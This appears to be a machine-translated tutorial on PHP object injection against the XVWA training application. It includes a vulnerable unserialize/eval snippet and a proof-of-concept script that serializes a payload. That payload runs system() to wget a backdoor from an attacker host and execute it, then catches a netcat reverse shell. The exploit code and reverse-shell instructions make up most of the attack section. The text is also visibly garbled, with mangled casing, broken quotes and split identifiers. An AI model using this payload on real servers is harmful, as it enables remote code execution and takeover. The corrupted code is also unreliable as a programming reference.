PHP serialization/object Injection Vulnerability Analysis PHP Object-oriented programming PHP object-oriented PHP object-oriented real

This article is a short story about PHP serialization/object Injection Vulnerability Analysis, which describes how to get a remote shell for a host.

If you want to test this vulnerability yourself, you can do so through XVWA and Kevgir.

The first step in exploiting the exploits, we begin to test whether the target application has PHP serialization. In order to assist the test, we used the Burpsuite superserial plugin, download the address here. It will passively detect the existence of PHP and Java serialization.

Analysis
We have detected that PHP serialization is used in the application, so we can start to verify that the application code contains a remote code execution vulnerability. It is important to note that the serialized object is taken from the parameter "R":

$var 1=unserialize ($_request[' R ');
The deserialization and Eval are then performed:

Eval ($this->inject);
Next, execute:

echo "
". $var 1[0]."-". $var 1[1];
With these, if we bypass the PHP serialization object of parameter R, then we can get the code execution vulnerability!

< PHP   error_reporting (e_all);  Class phpobjectinjection{public    $inject;     function __construct () {     }     function __wakeup () {      if (isset ($this->inject)) {        eval ($this- inject);}}}  R=a:2:{i:0;s:4: "Xvwa"; i:1;s:33: "Xtremevulnerable Web Application";}  if (Isset ($_request[' R '))) {      $var 1=unserialize ($_request[' R ']);         if (Is_array ($var 1)) {       echo "". $var 1[0]. "-". $var 1[1];    }  } else{    echo "parameter is missing";  }? >

Exploit exploits
To exploit this vulnerability, we created a simple PHP script that automatically generated the PHP serialization payload and ran the command we wanted on the target remote host. Then I created a generic PHP bounce shell, with the following download addresses:

Http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: You need to upload this file to the Web server, change the local IP and port in the bounce shell script, and use the following code:

<?php/*php Object Injection POC Exploit by 1n3@crowdshield-https://crowdshield.coma simple PoC to Exploit PHP object Injections flaws and gain remote shell access. Shouts to @jstnkndy @yappare for theassist! Note:this Requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote Host with a connect back IP configured*/print "====================================================================== ========\r\n ";p rint" PHP Object injection Pocexploit by 1n3 @CrowdShield-https://crowdshield.com\r\n ";p rint" ========= =====================================================================\r\n ";p rint" [+] Generating Serializedpayload ... [ok]\r\n ";p rint" [+] launching Reverselistener ... [ok]\r\n]; system (' Gnome-terminal-x sh-c \ ' nc-lvvp1234\ '); class phpobjectinjection{//change url/filename to MATCH you R SETUP Public $inject = "System (' wget Http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php Phpobjbackdoor.php '); ";} $url = ' Http://taRgeturl/xvwa/vulnerabilities/php_object_injection/?r= '; Change Totarget Url/parameter$url = $url. UrlEncode (Serialize (newphpobjectinjection));p rint "[+] sendingexploit ... [ok]\r\n ";p rint" [+] dropping down tointeractive shell ... [ok]\r\n ";p rint" ==============================================================================\r\n "; $response = File_get_contents ("$url");? >

Demo
Now that we have the script ready, we can execute it to get a bounce shell on the remote host to execute the command remotely!

The above is the whole content of this article, I hope that you learn PHP programming help.

The above describes the PHP serialization/object Injection vulnerability analysis, including PHP, object aspects of the content, I hope the PHP tutorial interested in a friend helpful.

